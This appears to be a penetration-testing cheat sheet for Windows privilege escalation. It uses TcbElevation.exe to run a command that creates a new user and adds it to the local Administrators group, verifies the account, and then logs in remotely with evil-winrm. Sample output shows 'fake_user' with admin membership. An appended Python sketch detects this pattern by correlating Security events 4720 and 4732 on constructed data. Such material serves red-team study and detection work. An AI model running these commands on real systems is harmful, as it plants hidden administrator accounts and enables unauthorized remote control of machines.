Privesc #1: Create a New User in Administrators Group
1. Create a New User
.\TcbElevation.exe anything "C:\Windows\System32\cmd.exe /c net user <NEW_USER> <NEW_PASSWORD> /add && net localgroup administrators <NEW_USER> /add"
Sample Output:
TO-DO
2. Check
net user <NEW_USER> /domain
Sample Output:
*Evil-WinRM* PS C:\programdata> net user fake_user /domain
User name fake_user
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/14/2025 10:40:51 PM
Password expires 9/25/2025 10:40:51 PM
Password changeable 8/15/2025 10:40:51 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.
3. Remote WinRM
evil-winrm -i <TARGET_DOMAIN> -u <NEW_USER> -p <NEW_PASSWORD>
Sample Output:
TO-DO
Ref: TcbElevation.exe
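Detection view of steps 1 and 2, as an added example that is not part of the original page: with account-management auditing enabled, the Security log records the account creation (event 4720) and the addition of that account's SID to BUILTIN\Administrators (event 4732). The sketch below correlates the two over constructed sample events; the flattened event dictionaries, the SIDs and the five-minute window are assumptions.

```python
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators
WINDOW = timedelta(minutes=5)        # assumed correlation window

# Constructed sample records (flattened Security log events, not real data).
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2025-08-10T09:00:00",
     "TargetUserName": "svc_backup", "TargetSid": "S-1-5-21-1111-2222-3333-1602"},
    # New account added to Backup Operators: not the Administrators group.
    {"EventID": 4732, "TimeCreated": "2025-08-10T09:00:30",
     "MemberSid": "S-1-5-21-1111-2222-3333-1602", "TargetSid": "S-1-5-32-551"},
    # Long-standing account added to Administrators: no matching 4720.
    {"EventID": 4732, "TimeCreated": "2025-08-12T14:00:00",
     "MemberSid": "S-1-5-21-1111-2222-3333-1105", "TargetSid": ADMINISTRATORS_SID},
    # The pattern from this page: create, then add to Administrators at once.
    {"EventID": 4720, "TimeCreated": "2025-08-14T22:40:51",
     "TargetUserName": "fake_user", "TargetSid": "S-1-5-21-1111-2222-3333-1601"},
    {"EventID": 4732, "TimeCreated": "2025-08-14T22:40:52",
     "MemberSid": "S-1-5-21-1111-2222-3333-1601", "TargetSid": ADMINISTRATORS_SID},
]


def find_new_admin_accounts(events, window=WINDOW):
    """Return accounts created and added to Administrators within `window`."""
    created = {}   # account SID -> (creation time, account name)
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4720:
            # 4720: TargetSid / TargetUserName describe the new account.
            created[ev["TargetSid"]] = (ts, ev["TargetUserName"])
        elif ev["EventID"] == 4732 and ev["TargetSid"] == ADMINISTRATORS_SID:
            # 4732: TargetSid is the group, MemberSid is the account added.
            hit = created.get(ev["MemberSid"])
            if hit and ts - hit[0] <= window:
                findings.append({
                    "account": hit[1],
                    "sid": ev["MemberSid"],
                    "delay_seconds": (ts - hit[0]).total_seconds(),
                })
    return findings


if __name__ == "__main__":
    for finding in find_new_admin_accounts(SAMPLE_EVENTS):
        print("ALERT new account added to Administrators:", finding)
```

A first network logon (event 4624) by a flagged account, matching step 3, is a natural follow-up pivot.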